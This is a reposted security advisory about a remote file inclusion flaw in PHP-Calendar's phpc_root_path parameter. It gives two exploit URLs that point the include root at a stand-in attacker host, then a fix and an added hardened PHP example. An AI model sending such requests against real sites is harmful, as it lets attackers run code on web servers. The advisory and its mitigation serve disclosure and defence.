[Repost] PHP-Calendar File Inclusion Vulnerability (phpc_root_path)
Source: security team ([url]www.securiteam.com[/url])
Summary
PHP-Calendar is "a PHP based calendaring program". Due to insufficient filtering of user provided data by PHP-Calendar, a remote attacker can cause the program to include arbitrary PHP files (external to the web site) and execute the code found in them.
Credit:
The information has been provided by GulfTech Security.
The original article can be found at: [url]http://www.gulftech.org/?node=research&article_id=00060-12292004[/url]
Details
Exploit:
[url]http://path/includes/calendar.php?phpc_root_path=http://attacker/includes/html.php[/url]
[url]http://path/includes/setup.php?phpc_root_path=http://attacker/includes/html.php[/url]
If PHP globals (register_globals) are set to on, it is highly probable that an attacker will be able to include arbitrary PHP files and thus execute system commands with the rights of the web server.
Solution:
PHP-Calendar already has a defined constant to help prevent this kind of attack. The check can be seen in other PHP-Calendar files such as db.php:
    if ( !defined('IN_PHPC') ) {
        die("Hacking attempt");
    }
Adding this check to the top of the affected pages (includes/calendar.php and includes/setup.php) should suffice to prevent the kinds of attacks described in this advisory, since those files will then refuse to run unless they were included by a PHP-Calendar entry point that defined IN_PHPC.
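As an added illustration, not code from PHP-Calendar or from the advisory, here is what a hardened includes/ file looks like: the IN_PHPC guard the solution describes, plus a check that the root path can never resolve to a remote wrapper or a directory outside the application. The helper name phpc_safe_root_path and the entry point index.php are assumptions.

```php
<?php
// Added illustration, not PHP-Calendar's own code: a hardened includes/ file,
// shown next to the pattern the advisory describes. File names follow the
// advisory; the helper phpc_safe_root_path and index.php are assumed.

// ---- The problem -----------------------------------------------------------
// With register_globals on, ?phpc_root_path=http://... becomes a PHP variable
// before any code runs, so an unguarded
//     include($phpc_root_path . 'includes/html.php');
// fetches and executes a remote file (remote file inclusion).

// ---- Guard 1: refuse direct requests (the check quoted from db.php) ---------
// Only the real entry point defines the constant, e.g. in index.php:
//     define('IN_PHPC', true);
//     $phpc_root_path = dirname(__FILE__) . '/';
//     require $phpc_root_path . 'includes/setup.php';
if (!defined('IN_PHPC')) {
    die("Hacking attempt");
}

// ---- Guard 2: never trust a request-controllable value as an include root ---
// Whatever $phpc_root_path holds (config file or injected global), it must
// resolve to a local directory inside the application; wrappers and ../ fail.
function phpc_safe_root_path($candidate, $app_root)
{
    // Any scheme prefix (http:, ftp:, php:, data:) is a stream wrapper, not a dir.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        trigger_error('phpc_root_path must be a local directory', E_USER_ERROR);
    }
    $real = realpath($candidate);
    $base = realpath($app_root);
    if ($real === false || $base === false
        || strpos($real . '/', $base . '/') !== 0 || !is_dir($real)) {
        trigger_error('phpc_root_path escapes the application root', E_USER_ERROR);
    }
    return rtrim($real, '/') . '/';
}

// The application root is derived from this file's own location, never from
// the request; an injected value is validated and rejected rather than used.
$app_root = dirname(dirname(__FILE__));
$phpc_root_path = phpc_safe_root_path(
    isset($phpc_root_path) ? $phpc_root_path : $app_root, $app_root);
require $phpc_root_path . 'includes/html.php';
```

Requesting this file directly now stops at the IN_PHPC check, and even with register_globals on an injected http:// value is rejected before any include runs.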